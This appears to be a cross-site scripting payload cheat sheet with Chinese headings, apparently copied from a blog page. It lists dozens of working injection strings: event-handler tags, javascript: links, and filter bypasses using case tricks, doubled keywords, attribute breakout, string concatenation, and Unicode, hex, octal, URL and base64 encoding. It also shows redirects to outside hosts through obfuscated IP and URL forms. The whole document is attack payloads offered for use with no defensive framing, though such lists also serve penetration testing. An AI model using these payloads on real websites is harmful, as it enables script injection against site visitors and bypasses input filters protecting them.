<scirpt>alert("xss");</script>
<img src=1 onerror=alert("xss");>
<input onfocus="alert('xss');">
<input onblur=alert("xss") autofocus><input autofocus>
<input onfocus="alert('xss');" autofocus>
<details ontoggle="alert('xss');">
<details open ontoggle="alert('xss');">
<svg onload=alert("xss");>
<select onfocus=alert(1)></select>
<select onfocus=alert(1) autofocus>
<iframe onload=alert("xss");></iframe>
<video><source onerror="alert(1)">
<audio src=x onerror=alert("xss");>
<body/onload=alert("xss");>
<body
onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<textarea onfocus=alert("xss"); autofocus>
<marquee onstart=alert("xss")></marquee>
javascript伪协议
<a href="javascript:alert(`xss`);">xss</a>
<iframe src=javascript:alert('xss');></iframe>
<form action="Javascript:alert(1)"><input type=submit>
过滤空格
用/代替空格
<img/src="x"/onerror=alert("xss");>
过滤关键字
(大小写 双写)
<ImG sRc=x onerRor=alert("xss");>
<scrscriptipt>alert(1)</scrscriptipt>
<imimgg srsrcc=x onerror=alert("xss");>
使用%0A换行
%0A<script>alert("XSS");</script>
过滤尖括号(根据情况判断单引号双引号)
<>标签被转换为实体 直接往input标签里注入触发事件
' onmouseup=alert(123)//
' onerror='alert(123)
' onmousemove='javascript:alert(1)
" οnfοcus="alert(document.domain)"
" οnclick=alert(document.domain)
"onmouseover = "alert(document.domain)"
字符拼接 <img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)"> <script>top["al"+"ert"](`xss`);</script> 利用注释、标签的优先级等 <<script>alert("xss");//<</script> <title><img src=</title>><img src=x onerror="alert(`xss`);"> <SCRIPT>var a="\\";alert("xss");//";</SCRIPT> 编码绕过 Unicode编码绕过 <img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> hex绕过 <img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')> Ascii码绕过 <img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))"> url编码绕过 <img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> 八进制 <img src=x onerror=alert('\170\163\163')> base64绕过 <img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"> 跳转到百度 <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="> 过滤括号 <svg/onload="window.onerror=eval;throw'=alert\x281\x29';"> 过滤url地址 使用url编码 <img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`> 1.十进制IP <img src="x" onerror=document.location=`http://2130706433/`> 2.八进制IP <img src="x" onerror=document.location=`http://0177.0.0.01/`> 3.hex <img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`> 4.html标签中用//可以代替http:// <img src="x" onerror=document.location=`//www.baidu.com`> 5.使用中文逗号代替英文逗号 <img src="x" onerror="document.location=`http://www。baidu。com`">//会自动跳转到百度
浙公网安备 33010602011771号